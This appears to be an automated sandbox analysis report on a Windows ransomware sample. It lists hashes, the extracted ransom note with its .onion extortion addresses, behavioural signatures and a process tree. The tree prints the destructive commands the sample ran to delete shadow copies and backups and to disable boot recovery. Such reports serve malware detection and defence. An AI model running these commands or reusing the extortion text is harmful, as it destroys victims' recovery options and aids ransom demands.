Resubmissions

29/12/2023, 12:09

231229-pbfk1sgha8 10

29/12/2023, 12:07

231229-pahnzsgha4 10

Analysis

  • max time kernel
    149s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    29/12/2023, 12:09

General

  • Target

    6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe

  • Size

    510KB

  • MD5

    13ccbab51e6ab57c89ad99f3f676c7f3

  • SHA1

    673fc190f8fb4f7c921de900cedb2f213982c416

  • SHA256

    6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49

  • SHA512

    7c2226b18cdd7a3e6cea078960292c4a8b1c19d39fe692f97ca8b21c90ee25a126c2a8ca65c49e222ce3d691b0e73645a21102fb12a65db1da7a4c6bd1dfba46

  • SSDEEP

    12288:PVQfoJw+q6puobmO/OSST0qU2bwnq7hPVWc4d5pi:PHZh/dSsE0shP

Malware Config

Extracted

Path

C:\Users\Admin\HOW_TO_RECOVER_FILES.txt

Ransom Note
> WHAT HAPPEND?
Important files on your network have been ENCRYPTED and now have the extension .BEAFHHJCJH.
To recover your files, you need to follow the instructions below.

> SENSITIVE DATA
Sensitive data from your network has been DOWNLOADED.
If you DON'T WANT to your sensitive data PUBLISHED on our leak blog, you must act quickly.
LEAK BLOG: noescapemsqxvizdxyl7f7rmg5cdjwp33pg2wpmiaaibilb4btwzttad.onion
Data includes:
- Personal data of employees, resume, DL, SSN.
- Complete network map, including credentials for local and remote services.
- Private financial information including: customer data, accounts, budgets, annual reports, bank statements.
- Production documentation, including: datagrams, diagrams, drawings.
- And much more...
Sample DOWNLOADED FILES are available in your user panel.

> CAUTION
DO NOT MODIFY ENCRYPTED FILES BY YOURSELF.
DO NOT USE THIRD PARTY SOFTWARE TO RESTORE YOUR DATA.
YOU MAY DAMAGE YOUR FILES, THIS WILL RESULT IN PERMANENT DATA LOSS.

> WHAT SHOULD I DO NEXT?
You need to contact us:
1. Download and install TOR browser: https://www.torproject.org/
2. Go to your user panel: bwjbbpbcihglahwxxusmyy2nxqdc4oqy4rvyhayn4dxhqzji4qi7taid.onion/9aa2579b-2563-4b08-a614-d4f04bdf60a1-uB5wmqiXqjhZ
If you have difficulties with authorization in the client panel, you can use the contact form in the "LEAKS BLOG" to contact us
URLs

http://noescapemsqxvizdxyl7f7rmg5cdjwp33pg2wpmiaaibilb4btwzttad.onion

http://bwjbbpbcihglahwxxusmyy2nxqdc4oqy4rvyhayn4dxhqzji4qi7taid.onion/9aa2579b-2563-4b08-a614-d4f04bdf60a1-uB5wmqiXqjhZ

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (145) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Executes dropped EXE 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe
    "C:\Users\Admin\AppData\Local\Temp\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2520
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wmic SHADOWCOPY DELETE /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic SHADOWCOPY DELETE /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2676
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      2⤵
      PID:2912
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
      2⤵
      PID:2388
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -deleteOldest
      2⤵
      PID:2716
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -keepVersions:0
      2⤵
      PID:552
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c vssadmin Delete Shadows /All /Quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1824
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      PID:2004
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      PID:1512
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wmic SHADOWCOPY DELETE /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:680
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic SHADOWCOPY DELETE /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2592
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      2⤵
      PID:2904
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
      2⤵
      PID:2284
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -deleteOldest
      2⤵
      PID:2688
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -keepVersions:0
      2⤵
      PID:780
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c vssadmin Delete Shadows /All /Quiet
      2⤵
      PID:1636
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1680
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      PID:1768
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      PID:1724
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wmic SHADOWCOPY DELETE /nointeractive
      2⤵
      PID:2308
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic SHADOWCOPY DELETE /nointeractive
        3⤵
        PID:2072
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      2⤵
      PID:2136
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
      2⤵
      PID:1504
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -deleteOldest
      2⤵
      PID:2484
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -keepVersions:0
      2⤵
      PID:1004
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c vssadmin Delete Shadows /All /Quiet
      2⤵
      PID:2512
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:652
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      PID:452
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      PID:1064
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2080
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {041A5DBC-69AD-4339-BF7A-0E5FBCBA54FC} S-1-5-21-3601492379-692465709-652514833-1000:CALKHSYM\Admin:Interactive:[1]
    1⤵
    PID:2304
    • C:\Users\Admin\AppData\Roaming\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe
      C:\Users\Admin\AppData\Roaming\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe
      2⤵
      • Executes dropped EXE
      PID:1636
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:1344

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Roaming\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe

    Filesize

    510KB

    MD5

    13ccbab51e6ab57c89ad99f3f676c7f3

    SHA1

    673fc190f8fb4f7c921de900cedb2f213982c416

    SHA256

    6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49

    SHA512

    7c2226b18cdd7a3e6cea078960292c4a8b1c19d39fe692f97ca8b21c90ee25a126c2a8ca65c49e222ce3d691b0e73645a21102fb12a65db1da7a4c6bd1dfba46

  • C:\Users\Admin\HOW_TO_RECOVER_FILES.txt

    Filesize

    1KB

    MD5

    f8a0490814225ac6ba2ec064c0e31056

    SHA1

    90fdd0ab61fe6edfb855a1a26582c26e341a8df6

    SHA256

    be089a5f36c6b3f87d126eff28913d939a0d32b8deed9a27e5a627b75cdb807c

    SHA512

    0b4496dd30775a39d3b8de0fb975aaffa3ea9997e63b70610c4c5dc85116dbc3f7c6fa2e918c02fa383017c6b9841061ff60585378565316c66ede7a912ea241